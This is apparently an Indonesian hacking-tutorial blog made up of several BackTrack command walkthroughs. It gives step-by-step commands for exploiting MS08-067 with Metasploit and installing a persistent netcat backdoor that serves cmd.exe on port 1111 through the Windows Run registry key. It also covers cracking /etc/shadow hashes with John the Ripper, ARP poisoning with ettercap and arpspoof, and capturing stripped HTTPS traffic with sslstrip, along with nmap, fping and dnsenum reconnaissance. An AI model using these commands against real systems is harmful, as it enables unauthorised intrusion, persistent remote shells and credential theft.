Minggu, 10 Mei 2015

Tutorial Backdoor menggunakan exploit NC EXE

Tutorial Backdoor menggunakan exploit NC EXE

 Langkah-langkahnya sebai berikut :

cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/
nmap -sS -0 192.168.77.130


new terminal: 
msfconsole
 

use exploit/windows/smb/ms08_067_netapi
 

set payload windows/meterpreter/reverse_tcp
 

set lhost 192.168.77.133
 

set rhost 192.168.77.130
 

exploit
 

"jika exploit masuk, lanjutkan mengirim backdoor"
upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\
 

reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN
 

reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 1111 -e cmd.exe"
 

reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN
 

reboot
 

nc 192.168.77.130 1111
done
systeminfo
shutdown -r -t 20


Untuk lebih jelas lagi silakan buka link video dibawah ini :

https://www.youtube.com/watch?v=-prGVe4KOio


 

Jumat, 24 April 2015

Tutorial Offline Password Attack John The Ripper

Tutorial  Offline Password Attack  John The Ripper


langkah-langkahnya sebagai berikut :

Root#cd/ pentest/passwords/john

Root#cat /etc/shadow

Root#./unshadow /etc/passwd /etc/dhadow >backtrack.txt

Root#Ls

Root#cat backtrack.txt

Root#john backtrack.txt

Root#john --show backtrack.txt

-----------------------------------------------

untuk lebih jelas silakan buka link dibawah ini

https://www.youtube.com/watch?v=yoRqTe_l3NE



Jumat, 17 April 2015

TUTORIAL ARP POISONING ETTERCAP

 TUTORIAL ARP POISONING ETTERCAP

 
 
ARP Poisoning adalah protocol yang berfungsi memetakan ip address menjadi MAC address. sebagai penghubung antara data link dan ip layer pada TCP/IP. semua komunikasi yang berbasis ethernet menggunakan ARP ini. intinya setiap komputer atau device yang akan berkomunikasi pasti akan melakukan transaksi atau tukar menukar informasi terkait  antara ip dan MAC address transaksi akan disimpan di dalam cache OS anda
berikut adalah tutorialnya:
1. Menyerang secara menyeluruh
  ettercap -T -q -i eth0 -M ARP // //
Cara ini akan meracuni seluruh ip yang terdaftar di ARP

2. Menyerang IP tertentu
  ettercap -T -q -i eth0 -M ARP /192.168.77.15/ //
Cara ini hanya akan menyerang ip tertentu yang dituju.

Ettercap juga tersedia dalam GUI dengan cara ketik:
ettercap -G
 
UNtuk lebih jelas silakan lihat buka link video ini
 
 

 
 
 

Tutorial ARP SPOOF SSLTRIP BACKTRACK 5

Tutorial ARP SPOOF SSLTRIP BACKTRACK 5
 
merubah PC menjadi router gateway:
echo "1" > /proc/sys/net/ipv4/ip_forward
 
menjalankan perintah redirect paket menuju port 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
 
meracuni ARP Tabel pada jaringan
arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1
atau arpspoof -i eth0 -t 192.168.0.0/24 192.168.0.1
 
memetakan jaringan
scanning netdiscover -i eth0 -r 192.168.0.1/24
 
mencari ip gateway
netstat -nr
 
menamkap paket data dan menyimpan ke file "cap"
sslstrip -w cap -l 8080
 
melihat isi file "cap"
cat cap

Minggu, 05 April 2015

Tutorial Nmap

Tutorial Nmap
Sebuah ping adalah tipe khusus dari paket jaringan yang disebut paket ICMP. Ping bekerja dengan mengirimkan jenis tertentu lalu lintas jaringan, disebut paket ICMP Echo Request, untuk interface tertentu pada perangkat komputer atau jaringan. Jika perangkat (dan kartu jaringan terpasang) yang menerima paket ping diaktifkan dan tidak dibatasi dari merespons, mesin penerima akan merespon kembali ke mesin berasal dengan Echo Reply paket. Selain memberitahu kita bahwa tuan adalah hidup dan menerima lalu lintas, ping memberikan informasi berharga lainnya termasuk total waktu yang dibutuhkan untuk paket untuk melakukan perjalanan ke target dan kembali.Ping juga melaporkan kehilangan lalu lintas yang dapat digunakan untuk mengukur keandalan jaringankoneksi.


mundur contoh tutorial ping
Ping google.com dengan argumen hitungan -c 4 sampai ping 4 kali.
Cara paling mudah untuk menjalankan menyapu ping dengan alat yang disebut FPing. FPing dibangun ke Backtrack dan dijalankan dari terminal. Cara termudah untuk menjalankan FPing adalah untuk membuka jendela terminal dan ketik berikut:
fping -a -g 172.16.45.1 172.16.45.254> hosts.txt
The "-a" argumen yang digunakan untuk hanya menampilkan host hidup dalam output. Hal ini membuat laporan akhir kami jauh lebih bersih dan lebih mudah dibaca. "-g" Digunakan untuk menentukan kisaran alamat IP kita ingin menyapu. Anda harus memasukkan kedua awal dan alamat IP akhir. Dalam contoh ini, kita scan semua IP dari 172.16.45.1 ke 172.16.45.254. The ">" karakter digunakan untuk pipa output ke file, dan hosts.txt yang digunakan untuk menentukan nama file hasil kami akan disimpan ke.Port Scanning
Ada total 65.536 (0-65,535) port pada setiap komputer. Port dapatbaik TCP atau UDP tergantung pada layanan menggunakan port. Kami memindai komputer untuk melihat apa port yang digunakan atau "terbuka". Ini memberi kita gambaran yang lebih baik tentang tujuan dari mesin, yang memberi kami ide yang lebih baik tentang bagaimana untuk menyerang kotak.TCP 3-Way Handshake
Sebelum kita melanjutkan, pertama-tama kita harus tahu bagaimana komputer di jaringan berkomunikasi satu sama lain. Ketika dua komputer ingin berkomunikasi, mereka pergi melalui proses yang dikenal sebagai 3-way handshake. Pertama Komputer akan mengirim paket sinkronisasi yang lain B. komputer Kemudian, jika komputer B adalah mendengarkan (telah pelabuhan terbuka), itu akan merespon kembali ke A dengan paket sinkronisasi-pengakuan. Akhirnya, komputer A akan mengirim paket pengakuan ke komputer B, dan dua komputer akan berkomunikasi seperti biasa.Menggunakan Nmap
Nmap ditulis oleh Gordon Lyon dan tersedia secara gratis dari www.insecure.org dan dibangun ke hari ini Backtrack Linux 5.
Rekomendasi Reading: Nmap Jaringan Scanning
Ini adalah panduan resmi untuk menggunakan scanner nmap. Apa lagi yang bisa saya katakan? Buku ini akan mencakup nmap jauh lebih mendalam daripada situs ini.
Ketika kita melakukan port scan, Nmap akan membuat paket dan mengirimkannya ke setiap port yang ditunjuk pada komputer seperti 3-way handshake. Tujuannya adalah untuk menentukan jenis respon yang kita dapatkan dari port sasaran.
Untuk menggunakan Nmap, membuka terminal dan ketik:
nmap -p- 192.168.56.101


The "-p-" memberitahu nmap untuk memindai semua port pada mesin target. The 10.0.2.15 adalah ip lokal dari mesin target.
kerentanan Scanning

Untuk memindai sistem untuk kerentanan, kita akan menggunakan scanner kerentanan. Ada beberapa scanner yang baik tersedia, tapi kami akan fokus pada Nessus. Untuk menginstal jenis Nessus:

root @ bt: ~ # apt-get install Nessus

Kemudian, untuk mengakses Nessus melalui GUI pergi ke:
Aplikasi -> Backtrack -> Penilaian Kerentanan -> Kerentanan Scanner -> Nessus -> Nessus Mulai.


DNSENUM TUTORIAL


DNSENUM tutorial

Troturial Tentang Dnsenum
Perintah Dasarnya :


                             


                                  Pertama tama masuk ke terminal dns enum, seperti gambar di atas.


Masukan perintah sebagai berikut.
./dnsenum.pl target.com
Contoh : ./dnsenum.pl google.com


                                       Inilah tampilan dari dnsenum pada website google.com


DNSenum tutorial


Troturial Tentang Dnsenum
Perintah Dasarnya :

Pertama tama masuk ke terminal dns enum,.
Masukan perintah sebagai berikut.
./dnsenum.pl target.com
Contoh : ./dnsenum.pl google.com